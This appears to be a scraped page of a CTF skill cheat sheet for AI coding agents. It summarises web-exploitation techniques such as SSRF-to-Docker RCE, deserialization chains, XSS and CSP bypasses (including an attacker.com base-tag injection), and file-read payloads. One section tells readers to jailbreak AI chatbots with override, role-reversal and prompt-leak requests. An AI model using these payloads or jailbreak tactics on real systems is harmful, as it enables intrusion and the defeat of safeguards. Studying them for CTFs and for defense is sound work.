%2f bypasses nginx route matching but filesystem resolves it. See server-side-advanced.md.

WeasyPrint SSRF & File Read (CVE-2024-28184)

<a rel="attachment" href="file:///flag.txt"> or <link rel="attachment" href="http://127.0.0.1/admin"> -- WeasyPrint embeds fetched content as PDF attachments, bypassing header checks. Boolean oracle via /Type /EmbeddedFile presence. See server-side-advanced.md and cves.md.

MongoDB Regex / $where Blind Injection

Break out of /.../i with a^/)||(<condition>)&&(/a^. Binary search charCodeAt() for extraction. See server-side-advanced.md.

Pongo2 / Go Template Injection

{% include "/flag.txt" %} in uploaded file + path traversal in template parameter. See server-side-advanced.md.

ZIP Upload with PHP Webshell

Upload ZIP containing .php file → extract to web-accessible dir → file_get_contents('/flag.txt'). See server-side-advanced.md.

basename() Bypass for Hidden Files

basename() only strips dirs, doesn't filter .lock or hidden files in same directory. See server-side-advanced.md.

Custom Linear MAC Forgery

Linear XOR-based signing with secret blocks → recover from known pairs → forge for target. See auth-and-access.md.

CSS/JS Paywall Bypass

Content behind CSS overlay (position: fixed; z-index: 99999) is still in the raw HTML. curl or view-source bypasses it instantly. See client-side.md.

SSRF → Docker API RCE Chain

SSRF to unauthenticated Docker daemon on port 2375. Use /archive for file extraction, /exec + /exec/{id}/start for command execution. Chain through internal POST relay when SSRF is GET-only. See server-side-advanced.md.

Castor XML Deserialization via xsi:type (Atlas HTB)

Castor XML Unmarshaller without mapping file trusts xsi:type attributes for arbitrary Java class instantiation. Chain through JNDI (Java Naming and Directory Interface) / RMI (Remote Method Invocation) via ysoserial CommonsBeanutils1 for RCE. Requires Java 11 (not 17+). Check pom.xml for castor-xml. See server-side-advanced.md.

Apache ErrorDocument Expression File Read (Zero HTB)

.htaccess with ErrorDocument 404 "%{file:/etc/passwd}" reads files at Apache level, bypassing php_admin_flag engine off. Requires AllowOverride FileInfo. Upload via SFTP, trigger with 404 request. See server-side-advanced.md.

HTTP TRACE Method Bypass

Endpoints returning 403 on GET/POST may respond to TRACE, PUT, PATCH, or DELETE. Test with curl -X TRACE. See auth-and-access.md.

LLM/AI Chatbot Jailbreak

AI chatbots guarding flags can be bypassed with system override prompts, role-reversal, or instruction leak requests. Rotate session IDs and escalate prompt severity. See auth-and-access.md.

Admin Bot javascript: URL Scheme Bypass

new URL() validates syntax only, not protocol — javascript: URLs pass and execute in Puppeteer's authenticated context. CSP/SRI on the target page are irrelevant since JS runs in navigation context. See client-side.md.

XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty)

HTML injection → meta refresh redirect (CSP bypass) → admin bot loads attacker page → JavaScript makes cross-origin GET requests to localhost GraphQL endpoint via new Image().src → measures time-based SQLi (SLEEP(1)) through image error timing → character-by-character flag exfiltration. GraphQL GET requests bypass CORS preflight. See client-side.md.

React Server Components Flight Protocol RCE (Ehax 2026)

Identify via Next-Action + Accept: text/x-component headers. CVE-2025-55182: fake Flight chunk exploits constructor chain for server-side JS execution. Exfiltrate via NEXT_REDIRECT error → x-action-redirect header. WAF bypass: 'chi'+'ld_pro'+'cess' or hex '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'. See server-side-advanced.md and cves.md.

Unicode Case Folding XSS Bypass (UNbreakable 2026)

Pattern: Sanitizer regex uses ASCII-only matching (<\s*script), but downstream processing applies Unicode case folding (strings.EqualFold). <ſcript> (U+017F Latin Long S) bypasses regex but folds to <script>. Other pairs: ı→i, K (U+212A)→k. See client-side.md.

CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026)

Pattern: Exfiltrate inline text via CSS injection (no JS). Custom font assigns unique glyph widths per character. Container queries match width ranges to fire background-image requests — one request per character. Works under strict CSP. See client-side.md.

Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026)

Pattern: CSP allows cdnjs.cloudflare.com. Load Hyperscript (_= attributes) or Alpine.js (x-data, x-init) from CDN — they execute code from HTML attributes that sanitizers don't strip. See client-side.md.

Solidity Transient Storage Clearing Collision (0.8.28-0.8.33)

Pattern: Solidity IR pipeline (--via-ir) generates identically-named Yul helpers for delete on persistent and transient variables of the same type. One uses sstore, the other should use tstore, but deduplication picks only one. Exploits: overwrite owner (slot 0) via transient delete, or make persistent delete (revoke approvals) ineffective. Workaround: use _lock = address(0) instead of delete _lock. See web3.md.

CSP Nonce Bypass via base Tag Hijacking (BSidesSF 2026)

Pattern: CSP uses script-src 'nonce-xxx' but missing base-uri directive. Inject <base href="https://attacker.com/"> before a nonced <script src="relative.js"> — script loads from attacker server but satisfies CSP via the valid nonce. Defense: always include base-uri 'self'. See client-side.md.

JA4/JA4H TLS Fingerprint Matching (BSidesSF 2026)

Pattern: Server validates browser identity via JA4 (TLS ClientHello fingerprint) and JA4H (HTTP header ordering fingerprint) in addition to User-Agent. Spoofing UA alone fails; must match the target browser's TLS cipher suite order and HTTP header sequence. For legacy browsers, run the actual browser. See auth-and-access.md.

Client-Side HMAC Bypass via Leaked JS Secret (Codegate 2013)

Deobfuscate client-side JS to extract hardcoded HMAC secret, then forge signatures for arbitrary requests via browser console. See client-side.md.

SQLi Keyword Fragmentation Bypass (SecuInside 2013)

Single-pass preg_replace() keyword filters bypassed by nesting the stripped keyword inside the payload: unload_fileon → union after load_file removal. See server-side-exec.md.

Pickle Chaining via STOP Opcode Stripping (VolgaCTF 2013)

Strip pickle STOP opcode (\x2e) from first payload, concatenate second — both __reduce__ calls execute in single pickle.loads(). Chain os.dup2() for socket output. See server-side-deser.md.

XPath Blind Injection (BaltCTF 2013)

substring(normalize-space(../../../node()),1,1)='a' — boolean-based blind extraction from XML data stores via response length oracle. See server-side-exec.md.

SQLite File Path Traversal to Bypass String Equality (Codegate 2013)

Input /../gamesim_GM fails == "GM" string check but filesystem normalizes /var/game_db/gamesim_/../gamesim_GM.db to the blocked path. See server-side-advanced.md.

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes

Weekly Installs

784

Repository

ljagiello/ctf-skills

GitHub Stars

694

First Seen

Feb 1, 2026

Security Audits

Gen Agent Trust HubWarn SocketFail SnykFail

Installed on

codex765

opencode765

gemini-cli748

github-copilot748

amp744

kimi-cli743

多阶段Dockerfile最佳实践指南：构建更小更安全的容器镜像

8,800 周安装

Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)

Check assets returning 404 status — favicon.ico, robots.txt may contain data despite error codes: strings favicon.ico | grep -i flag

Tor hidden services: feroxbuster -u 'http://target.onion/' -w wordlist.txt --proxy socks5h://127.0.0.1:9050 -t 10 -x .txt,.html,.bak

Affine cipher OTP: only 312 possible values (12 mults × 26 adds), brute-force all in seconds

Express.js %2F middleware bypass: /api/export%2Fchat skips app.all("/api/export/chat") middleware; nginx decodes %2F before proxying

IDOR (Insecure Direct Object Reference) on WIP endpoints: grep for WIP/TODO/debug comments, compare auth decorators against production endpoints

Git history credential leakage: git log -p --all -S "password" finds deleted secrets

CI/CD variable theft: GitLab/Jenkins/GitHub CI/CD variables store service account tokens

Identity provider API takeover: admin token → set any user's password, bypass MFA with not_configured_action: skip

SAML SSO automation: preserve RelayState through entire flow, submit signed SAMLResponse to callback

Guacamole parameter extraction: API token or MySQL access exposes SSH keys and passphrases

TeamCity REST API RCE: admin creds → create project → add build step → trigger build (runs as build agent user, often root)